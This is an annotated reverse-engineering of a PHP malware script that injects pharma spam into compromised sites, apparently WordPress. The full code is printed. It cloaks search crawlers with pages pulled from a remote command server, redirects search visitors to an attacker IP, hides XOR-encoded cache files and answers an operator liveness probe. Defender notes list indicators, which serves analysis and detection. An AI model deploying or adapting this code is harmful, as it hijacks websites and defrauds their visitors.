Pythorian

reverse of mal script

Mar 10th, 2014
// Load-once guard: the constant 'frmDs' marks this payload as already included,
// so the body below runs a single time per request even if the file is pulled in twice.
if (!defined('frmDs')){
define('frmDs' ,1);
// Silence every warning/notice so the @-suppressed calls below never reach the page
// or the error log. Defender note: error_reporting(0) at the top of an unexpected
// include is itself a useful triage signal.
error_reporting(0);
  4.  
// XOR every byte of $in with the single key byte '*' (0x2A).
// XOR with a fixed byte is its own inverse, so the same function obfuscates the
// cache file on write and recovers it on read (see frm_getcache).
// Defender note: a cache file written by this script can be recognised by XOR-ing
// its contents with 0x2A and inspecting the result.
function frm_crpt($in)
{
$il=strlen($in);
$o='';

//loop through each character
for ($i = 0; $i < $il; $i++)
{
//XOR character with the constant key byte
$o.=$in[$i] ^ '*';
}
return $o;
}
  19.  
// Fetch $link and keep an XOR-obfuscated copy on disk; return the decoded cached body.
//   $tmpdir  writable directory located by frm_tmpdir()
//   $link    remote URL (in this script: the C2 feed or the toolbar PageRank query)
//   $cmtime  cache lifetime in minutes (multiplied by 60 and compared to filemtime)
//   $toe     when true, an empty remote response keeps the existing cache file
//            (its mtime is touched) instead of overwriting it with nothing
// Returns the decoded cache contents, '' when nothing usable is cached, or the raw
// download when the cache file cannot be opened for writing.
function frm_getcache($tmpdir,$link,$cmtime,$toe=false)
{
//filename = sess_(md5 of the url with scheme+host stripped) in the temp directory.
//The sess_ prefix mimics PHP's own session files. Defender note: sess_<32 hex> files
//outside the configured session directory (e.g. under wp-content/) indicate this payload.
$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
$fe = file_exists($f);
//refresh when there is no cache file or it is older than $cmtime minutes
if(!$fe || time() - filemtime($f) > 60 * $cmtime)
{
//download contents of page from remote url (outbound HTTP from the web server)
$dlc=file_get_contents($link);

//if file exists and couldnt get contents from remote url
if($fe && $dlc===false)
//keep the stale copy: bump its mtime so the next refresh attempt is deferred
@touch($f);
else
{
//if the file exists, the remote body is empty and $toe is set: keep the stale copy too
if($fe && empty($dlc) && $toe)
{
//update last modified timestamp in file system
@touch($f);
}
else
{
if($fp = @fopen($f,'w'))
{
//write contents of cached page as XOR'd contents
fwrite($fp, frm_crpt($dlc));
//close file pointer
fclose($fp);
}
else
{
//cache directory not writable: hand back the fresh download, nothing is stored
return $dlc;
}
}
}
}
$fc = @file_get_contents($f);
//XOR is self-inverse, so frm_crpt decodes here; a missing or empty file yields ''
return ($fc)?frm_crpt($fc):'';
}
  63.  
// Decide whether the requester looks like a search-engine crawler (true = crawler).
// The main flow serves the C2-supplied page to crawlers and redirects human visitors
// instead (search-engine cloaking), so crawlers are the audience this script wants to
// poison, not one it avoids.
// Signals, in order: Google/Postini/UCSD source IP ranges, a blank User-Agent,
// crawler keywords in the User-Agent, and a reverse-DNS name containing google/msn/yahoo.
function frm_isbot(){
//set $ua to the lower-cased user agent string of the requesting http client
$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);

//convert the client IP to an integer; on 32-bit PHP ip2long() returns a signed value,
//so a negative result is shifted by 2^32 to compare against the unsigned ranges below
if(($lip = ip2long($_SERVER['REMOTE_ADDR'])) < 0)
{
$lip+=4294967296;
}
//hard-coded crawler source ranges as (start, end) unsigned 32-bit integers
$rs = array(
array(3639549953,3639558142), //216.239.32.1 216.239.63.254 google
array(1089052673,1089060862), //64.233.160.1 64.233.191.254 google
array(1123635201,1123639294), //66.249.80.1 66.249.95.254 google
array(1208926209,1208942590), //72.14.192.1 72.14.255.254 google
array(3512041473,3512074238), //209.85.128.1 209.85.255.254 google
array(1113980929,1113985022), //66.102.0.1 66.102.15.254 google
array(1249705985,1249771518), //74.125.0.1 74.125.255.254 google
array(1074921473,1074925566), //64.18.0.1 64.18.15.254 postini
array(3481178113,3481182206), //207.126.144.1 207.126.159.254 postini
array(2915172353,2915237886), //173.194.0.1 173.194.255.254 google
array(2850291712,2850357247) //169.228.0.0 169.228.255.255 university of california san diego
);

//return true as soon as the client IP falls inside one of the crawler ranges
foreach ($rs as $r)
{
if($lip >= $r[0] && $lip <= $r[1])
{
return true;
}
}

//a blank user agent is treated as a crawler
if(!$ua)
{
return true;
}

//crawler name fragments to look for in the user agent
$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');

//unanchored substring match against the lower-cased user agent
foreach ($bots as $b) if(strpos($ua, $b)!==false)
{
return true;
}

//reverse dns lookup of the requesting client (an outbound DNS query for every request
//that reached this point)
$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);

//hostname fragments treated as crawlers
$hba=array('google','msn','yahoo');

//no forward confirmation of the PTR record: any hostname containing one of these strings matches
if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false)
{
return true;
}
return false;
}
  126.  
// Find a directory the web server can write to by probing each candidate with a
// throw-away file named md5(rand()); return the first writable path, or false.
// Despite the old description, nothing is "cleaned up": the probe file is created
// and deleted immediately. Candidates include WordPress content directories and the
// current directory ('.'), so sess_* cache files may end up inside the document root.
function frm_tmpdir(){
$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
//append any directories named by the TMP/TEMP/TMPDIR environment variables
foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
if ($t = getenv($v)) {$fs[]=$t;}
}
if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
//last resort: the directory the script runs from
$fs[]='.';

foreach ($fs as $f){
$tf = $f.'/'.md5(rand());
//a successful fopen for writing is taken as proof the directory is usable
if($fp = @fopen($tf, 'w')){
fclose($fp);
unlink($tf);
return $f;
}
}
return false;
}
  146.  
// True when the lower-cased Referer contains "<engine>." for google/bing/yahoo/ask/aol,
// i.e. the visitor arrived from a search-engine results page.
// Note the loose comparison (!= false): a match at offset 0 is treated as "not found".
function frm_seref(){
$r = @strtolower($_SERVER["HTTP_REFERER"]);
$ses = array('google','bing','yahoo','ask','aol');
foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
return false;
}
  154.  
// Return the first pharma keyword found in Referer + REQUEST_URI, or '' when none matches.
// The keyword list is the clearest fingerprint of the campaign: cloaking and redirects
// only fire for requests whose search query or path mentions one of these drug names.
//   $hasKey  nominally a pre-computed haystack; see the note below, it is always replaced
function frm_havekey($hasKey=false){
$nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');

//$s is never assigned in this function, so this condition always holds and $hasKey is
//always overwritten with the lower-cased Referer + REQUEST_URI
if($s == false)
$hasKey = @strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]);

//ignore requests carrying URL-encoded search operators ("site:" / "inurl:"), presumably
//people hunting for infected sites rather than searching for the drug names
if (strpos($hasKey,"site%3A") !==false || strpos($hasKey,"inurl%3A") !== false)
return '';

//check to see if page url or search string contains any of our keywords
foreach ($nks as $n)
{
//word-boundary match where '_' also counts as a boundary; $n is not preg_quote()d,
//but the list holds only letters and '-', so no pattern metacharacters are introduced
if(preg_match("/(\b|_)$n(\b|_)/" , $hasKey))
{
return $n;
}
}
return '';
}
  176.  
// Rolling multiplicative checksum over the bytes of $Str (a hash, not encryption).
//   $Str    input string
//   $Check  seed value
//   $Magic  multiplier (frm_chhash passes 0x21 and 0x1003F)
// Each step computes $Check = $Check * $Magic + ord(byte), reduced back into 32-bit range.
// Uses the curly-brace string offset syntax ($Str{$i}), which PHP 8 removed: this
// payload was written for PHP 5/7 hosts and no longer parses on PHP 8.
function frm_strtonum($Str, $Check, $Magic) {
//2^32, used to wrap the running value like an unsigned 32-bit register
$Int32Unit = 4294967296;

$length = strlen($Str);
//loop each character in string
for ($i = 0; $i < $length; $i++)
{
//multiply the running value by the chosen multiplier
$Check *= $Magic;

//wrap when the running value leaves 32-bit range
if ($Check >= $Int32Unit)
{
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}

//add the byte value of the current character
$Check += ord($Str{$i});
}
return $Check;
}
  201.  
// Build the "ch" checksum that accompanied toolbar PageRank queries; frm_chpr() places
// the result in the ch= parameter of the toolbarqueries.google.com request.
// Output is '7' + one check digit + the decimal hash. Two frm_strtonum passes are
// bit-mixed into $Hashnum, then the digit loop below derives a check digit in a
// Luhn-like fashion (every second digit from the right doubled and digit-summed).
function frm_chhash($String) {
$Check1 =frm_strtonum($String, 0x1505, 0x21); //0x21 prime 33
$Check2 = frm_strtonum($String, 0, 0x1003F); //0x1003F prime 65599
//bit shuffling of the two checksums into a single 32-bit value
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
$Hashnum = ($T1 | $T2);
$CheckByte = 0;
$Flag = 0;
//unsigned decimal rendering of the combined hash (uses $HashStr{$i} below, a PHP 8 parse error)
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
//walk the digits right to left, doubling every second one
for ($i = $length - 1; $i >= 0; $i --) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
//final adjustment of the check digit depending on digit count parity
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
  237.  
// Look up the toolbar PageRank of $url via toolbarqueries.google.com, cached for 7 days
// through frm_getcache (so a sess_* file keyed on the toolbar query URL is written too).
//   $url  page to rank
//   $td   cache directory passed through to frm_getcache
// Returns the single character at fixed offset 9 of the response when it contains
// "Rank_"; otherwise falls off the end and returns null. $pos is assigned but never used.
function frm_chpr($url,$td){
$ch=frm_chhash($url);
$res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
}
  244.  
// Cloaking redirect for human visitors. When the request is not from a crawler but
// arrived via a search-engine referrer, the whole response is replaced by a JavaScript
// document.location redirect to http://178.73.212.30/stat/go.php carrying the matched
// keyword (k), the referrer (s) and the current host+path (r); die() ends execution.
// Crawlers never receive this, which is what keeps the poisoned pages indexed.
// Defender note: 178.73.212.30 and the /stat/go.php path are indicators of this campaign;
// $hasKey is interpolated into the script body without any escaping.
function frm_red($hasKey){
if(!frm_isbot() && frm_seref()){
$r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$s=@urlencode($_SERVER['HTTP_REFERER']);
die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$hasKey&s=$s&r=$r\");</script></body></html>");
}
}
  253.  
  254.  
  255.  
  256.  
//actual work begins here: this runs on every request that includes the injected file
//get path of a writable directory for the sess_* cache files
$tdir = frm_tmpdir();
//set $isb to whether or not the requesting client is treated as a search engine crawler
$isb=frm_isbot();

//check if the referring search or requested page url contains a pharma keyword
$hasKey=frm_havekey();

//get the host name of the website that is running this script (leading "www." stripped)
$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));

//Remote presence check: a POST whose field name is md5(host.'ch') makes the script echo
//that field's value and exit. Defender note: a POST body whose field name equals
//md5(<site host>.'ch') is an operator probing whether the infection is live.
if($cv=@$_POST[md5($host . 'ch')])
{
exit($cv);
}

//only run the cloaking logic when a writable directory exists, the hostname is under
//100 characters and the site is not addressed by a bare IPv4 address
if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host))
{
//3-letter per-host tag derived from md5(host.'p1'); reused as the GET parameter name below
$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
//C2 feed URL from which all replacement content is fetched (indicator: todjzncave.byinter.net)
$sp = "http://todjzncave.byinter.net/stat/feed.php?pa=$parg&h=$host";

//for crawlers: only pages whose toolbar PageRank is above 1 get a replacement page.
//frm_chpr() declares two parameters but is called with one here ($td omitted).
$tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if($isb && ($ppr = frm_chpr($tp)) > 1)
{
//serve the C2-supplied page for this path (cached 24h) and stop; fall through if empty
$pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
if($pc)
{
die($pc);
}
}

//set the page requested to $ruri
$ruri = strtolower($_SERVER['REQUEST_URI']);

//non-permalink style URLs (/?<parg>=N or /index.php?<parg>=N): redirect human search
//visitors via frm_red, otherwise serve C2 page number N (cached 24h, empty replies keep the cache)
$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
frm_red($hasKey);
die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
}

//crawler requesting the homepage: replace it with the C2 feed page (cached 24h)
if (($ruri=='/' || $ruri=='/index.php') && $isb) {
$c=frm_getcache($tdir, $sp ,60*24);
if($c)
{
die($c);
}
}

//keyword hit: fetch the C2 list of poisoned paths ("&a=s", refreshed every 30 minutes for
//crawlers, weekly otherwise). If the current path appears in it as |path|, redirect human
//search visitors and serve crawlers the C2 page for that path.
if($hasKey && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
if(strpos($sdl, '|'.$ruri.'|') !== false)
{
frm_red($hasKey);
die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
}
}
}
//reached whenever nothing above ended the request (including the no-writable-directory,
//long-hostname and IP-addressed cases): keyword hits still redirect human search visitors
if($hasKey)
{
frm_red($hasKey);
}
}